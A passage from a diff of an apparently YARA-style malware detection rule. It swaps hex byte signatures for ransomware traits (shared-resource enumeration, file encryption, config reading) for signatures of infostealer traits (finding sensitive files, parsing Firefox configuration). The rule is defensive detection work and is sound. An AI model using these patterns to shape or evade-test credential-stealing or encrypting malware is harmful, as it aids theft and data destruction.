?? 48 8B CF E8 ?? ?? ?? ?? BA ?? ?? + ?? ?? 48 8B CF 44 8D 42 ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B + CF E8 ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? + ?? ?? 48 8B C8 48 8B F0 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? + ?? ?? ?? 49 83 7E ?? ?? 49 8D 56 ?? 76 ?? 48 8B 12 48 8B CB E8 ?? ?? ?? ?? 48 8B CE + E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 83 7D ?? ?? + 48 8D 55 ?? 76 ?? 48 8B 12 49 C7 C0 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B CE E8 + ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? + ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 4C 8B C6 BA ?? ?? ?? ?? 48 8B CF E8 + ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 8B E8 85 C0 75 ?? 48 8D 1D ?? ?? ?? ?? 48 8D 05 + ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CD 48 + 8B D8 E8 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B + CE E8 ?? ?? ?? ?? 48 8B 74 24 ?? 48 8B CF E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24 + ?? 33 C0 48 8B 6C 24 ?? 48 8B 7C 24 ?? 48 83 C4 ?? 41 5E C3 } - $enum_shared_resources = { - 55 8B EC 83 C4 ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 0B C0 0F - 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 8D 45 ?? 50 FF 75 ?? FF 15 - ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 3D ?? ?? ?? ?? 74 ?? 8B 4D ?? 51 8D 49 ?? 6B C9 ?? 8B - 45 ?? 8D 0C 01 6A ?? 51 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? FF 75 ?? E8 ?? - ?? ?? ?? 83 F8 ?? 76 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 0B C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 49 75 ?? EB - ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF - 15 ?? ?? ?? ?? C9 C2 + $find_sensitive_files_p1 = { + 48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? + ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 4C 8B F2 48 8B F9 45 33 + E4 4C 89 65 ?? 0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D ?? 49 C7 C0 ?? ?? ?? ?? 49 + FF C0 66 46 39 24 41 75 ?? 48 8B D7 48 8D 4D ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ?? + 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47 + 4D ?? 48 8D 55 ?? FF 15 ?? ?? ?? ?? 4C 8B F8 0F 57 C0 F3 0F 7F 45 ?? 0F 57 C9 F3 0F + 7F 4D ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 60 ?? 48 89 45 ?? 48 8D 4D ?? 48 89 08 + 49 83 FF ?? 0F 84 ?? ?? ?? ?? 4C 8D 2D ?? ?? ?? ?? F6 45 ?? ?? 0F 84 ?? ?? ?? ?? 0F + B7 4D ?? 0F B7 45 ?? 66 83 F9 ?? 75 ?? 66 85 C0 0F 84 ?? ?? ?? ?? 66 3B C9 75 ?? 66 + 3B C1 75 ?? 66 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 4C 89 64 24 ?? 0F 57 C0 0F 11 44 24 ?? + 4C 89 65 ?? 4C 89 65 ?? 49 C7 C0 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 49 FF C0 66 + 42 83 3C 47 ?? 75 ?? 48 8B D7 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ?? 48 + 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 0F + 1F 44 00 ?? 49 FF C0 66 42 83 3C 40 ?? 75 ?? 48 8D 55 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? + ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 49 8B D6 E8 ?? ?? ?? ?? 90 48 8D + 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ?? + E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ?? + 4C 89 64 24 ?? E9 ?? ?? ?? ?? 4C 89 65 ?? 0F 57 C0 0F 11 45 ?? 4C 89 65 ?? 4C 89 65 + ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 66 42 83 3C 40 ?? 75 ?? 48 8D 55 ?? 48 } - $find_files = { - 55 8B EC 81 C4 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 40 0F 84 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 - 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? C6 00 ?? 2B 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? - E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 8D ?? ?? ?? ?? C7 04 08 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 8B 8D ?? ?? ?? ?? C7 44 08 ?? - ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 - 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F - 85 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 45 ?? - 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 49 8B 1D ?? ?? ?? ?? 51 53 - FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8 - 83 C3 ?? 59 E2 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 0B - C9 75 ?? 3B D0 72 ?? EB ?? EB ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? - FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5 - ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C9 C3 + $find_sensitive_files_p2 = { + 8D 4D ?? E8 ?? ?? ?? ?? 90 4C 8D 55 ?? 48 8B 5D ?? 48 8B 75 ?? 48 83 FE ?? 4C 0F 47 + D3 4C 8B 5D ?? 49 83 FB ?? 72 ?? 49 8D 4B ?? 48 C7 C0 ?? ?? ?? ?? 48 3B C8 48 0F 42 + C1 4D 8D 0C 42 4D 8B C1 4D 2B C5 66 41 83 39 ?? 75 ?? BA ?? ?? ?? ?? 49 8B C5 42 0F + B7 0C 00 66 3B 08 75 ?? 48 83 C0 ?? 48 83 EA ?? 75 ?? 4D 2B CA 49 D1 F9 EB ?? 4D 3B + CA 74 ?? 49 83 E9 ?? 49 83 E8 ?? EB ?? 49 C7 C1 ?? ?? ?? ?? 49 83 F9 ?? 0F 84 ?? ?? + ?? ?? 49 FF C1 4C 89 64 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 65 ?? 4C 89 65 ?? 4D 3B + D9 0F 82 ?? ?? ?? ?? 4D 2B D9 49 C7 C0 ?? ?? ?? ?? 4D 3B D8 4D 0F 42 C3 48 8D 45 ?? + 48 83 FE ?? 48 0F 47 C3 4A 8D 14 48 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? + 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 + 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ?? + ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 + 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 + C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 85 C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 + 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 89 64 24 ?? 0F 57 C0 0F + 11 44 24 ?? 4C 89 64 24 ?? 4C 89 64 24 ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 66 42 83 3C } - $encrypt_files = { - 55 8B EC 83 C4 ?? 53 33 C0 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 - 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? FF 35 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 89 45 ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 50 50 6A ?? 50 6A ?? 68 ?? ?? ?? ?? - FF 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8D 45 - ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? - 83 7D ?? ?? 75 ?? 83 7D ?? ?? 73 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ?? - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B D2 75 ?? 0B C9 75 ?? B9 ?? ?? ?? ?? 89 4D ?? 89 55 ?? - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 89 55 ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 89 4D ?? 89 55 ?? 0B DB 75 ?? 0B C0 74 ?? 83 45 ?? ?? 83 55 ?? ?? FF 75 ?? - FF 75 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? - ?? ?? 76 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ?? 6B C0 ?? 89 45 ?? 6A ?? 8D 45 ?? 50 FF 75 - ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ?? - 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? - ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF - 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? DF 6D ?? DA 45 - ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF 6D ?? DA 65 ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF - 6D ?? DA 65 ?? DF 7D ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? E9 ?? ?? ?? ?? 8F 45 ?? - 8F 45 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? - ?? ?? 0B C0 74 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? - ?? 0B C0 75 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? - ?? 0B C0 75 ?? EB ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? - ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? - 50 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B C9 C2 + $find_sensitive_files_p3 = { + 47 ?? 75 ?? 48 8B D7 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ?? 48 8D 15 ?? + ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 + 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 + 8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49 + 83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 64 24 ?? 48 C7 44 + 24 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49 83 F8 ?? 76 ?? 48 8B + 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 64 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 + 44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 8B 46 + ?? 49 3B 46 ?? 74 ?? 48 8D 55 ?? 48 8B C8 E8 ?? ?? ?? ?? 49 8B 5E ?? BA ?? ?? ?? ?? + 48 8D 4D ?? E8 ?? ?? ?? ?? 49 8B 0E 48 83 C1 ?? 48 8B 01 48 85 C0 74 ?? 48 39 58 ?? + 72 ?? 77 ?? 4C 89 20 48 8B 40 ?? 48 89 01 EB ?? 48 8D 48 ?? 48 8B 01 48 85 C0 75 ?? + 48 8D 4D ?? E8 ?? ?? ?? ?? 49 83 46 ?? ?? EB ?? 4C 8D 45 ?? 48 8B D0 49 8B CE E8 ?? + ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 55 ?? 48 + 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 65 ?? 48 8B 4D + ?? 4C 89 65 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B + 45 ?? 49 83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48 + C7 45 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 55 + ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 65 ?? 48 } - $read_config_file = { - 55 8B EC 83 C4 ?? [0-20] 6A ?? 68 ?? ?? ?? ?? 6A - ?? (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 ?? 33 C0 C9 - C3 89 45 ?? 50 6A ?? (E8 | FF 15) ?? ?? ?? ?? 0B - C0 75 04 33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ?? - (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 - 89 45 ?? 50 (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04 - 33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ?? (E8 | FF 15) - ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 8B - D8 FF 75 ?? FF 75 ?? FF 75 ?? (E8 | FF 15) ?? ?? - ?? ?? FF 75 ?? (E8 | FF 15) ?? ?? ?? ?? 8B 5D ?? - 6A ?? 53 68 ?? ?? ?? ?? (E8 | FF 15) ?? ?? ?? ?? - 83 C3 ?? 8B 45 ?? 83 (E8 | FF 15) ?? 50 53 - (E8 | FF 15) ?? ?? ?? ?? 8A 03 A2 ?? ?? ?? ?? 83 - C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3 + $parse_firefox_configuration_p1 = { + 48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 41 54 41 55 41 56 41 57 48 8D AC 24 + ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? + 48 8B F1 48 89 4C 24 ?? 45 33 ED 44 89 6C 24 ?? 0F 57 C0 0F 11 01 0F 11 41 ?? 4C 89 + 29 4C 89 69 ?? 4C 89 69 ?? 4C 89 69 ?? 41 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 68 ?? 48 89 + 06 48 89 30 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? + ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 4C 8B 75 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 49 2B C6 + 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D 65 ?? 48 83 7D ?? ?? 4C 0F 47 65 ?? 4C 89 6C 24 + ?? 0F 57 C0 0F 11 44 24 ?? 0F 57 C9 F3 0F 7F 4C 24 ?? 4D 8D 7E ?? 41 8D 5D ?? 48 8D + 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? + ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24 ?? 8D 4B ?? 4C 3B FB 76 ?? 49 + 8B DF 48 83 CB ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 3B D8 76 ?? 48 8B D8 EB ?? 48 3B + D9 48 0F 42 D9 48 8D 4B ?? E8 ?? ?? ?? ?? 48 8B F8 48 89 44 24 ?? 4C 89 7C 24 ?? 48 + 89 5C 24 ?? 4D 8B C6 49 8B D4 48 8B CF E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 66 42 89 04 + 37 0F B6 05 ?? ?? ?? ?? 42 88 44 37 ?? 42 C6 04 3F ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D + 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? + 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 66 0F 6F 05 + ?? ?? 12 00 F3 0F 7F 44 24 ?? C6 44 24 ?? ?? 48 8B 4C 24 ?? 4C 89 6C 24 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 45 ?? + 0F 11 45 ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 90 } - $file_type_loop = { - 51 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 - ?? 75 03 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8 83 C3 - ?? 59 E2 DC [20-40] FF B5 ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 0B C0 75 44 FF B5 ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5 - ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 + $parse_firefox_configuration_p2 = { + 4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 48 8B 7D ?? 4C + 8D 75 ?? 48 83 7D ?? ?? 4C 0F 47 75 ?? 49 BC ?? ?? ?? ?? ?? ?? ?? ?? 49 3B FC 0F 87 + ?? ?? ?? ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 + 85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24 ?? 48 83 FF ?? 77 ?? + 48 89 7C 24 ?? BA ?? ?? ?? ?? 48 89 54 24 ?? 41 0F 10 06 0F 11 44 24 ?? EB ?? 48 8B + DF 48 83 CB ?? 49 3B DC 76 ?? 49 8B DC EB ?? 48 83 FB ?? B8 ?? ?? ?? ?? 48 0F 42 D8 + 48 8D 4B ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 7C 24 ?? 48 89 5C 24 ?? 4C 8D 47 ?? + 49 8B D6 48 8B C8 E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 + 85 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 FA ?? 48 + 0F 47 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 + 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 4C 24 + ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 54 24 ?? 48 8D 4C + 24 ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 8B + 4C 24 ?? 4C 89 6C 24 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB 75 ?? 48 8D 15 ?? ?? + ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? + ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 + ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 + 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? + ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF + 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 } - $encrypt_routine = { - FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? - [0-10] E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ?? - FF (35 | 75) [1-4] FF 75 ?? (E8 | FF 15) - ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 68 ?? - ?? 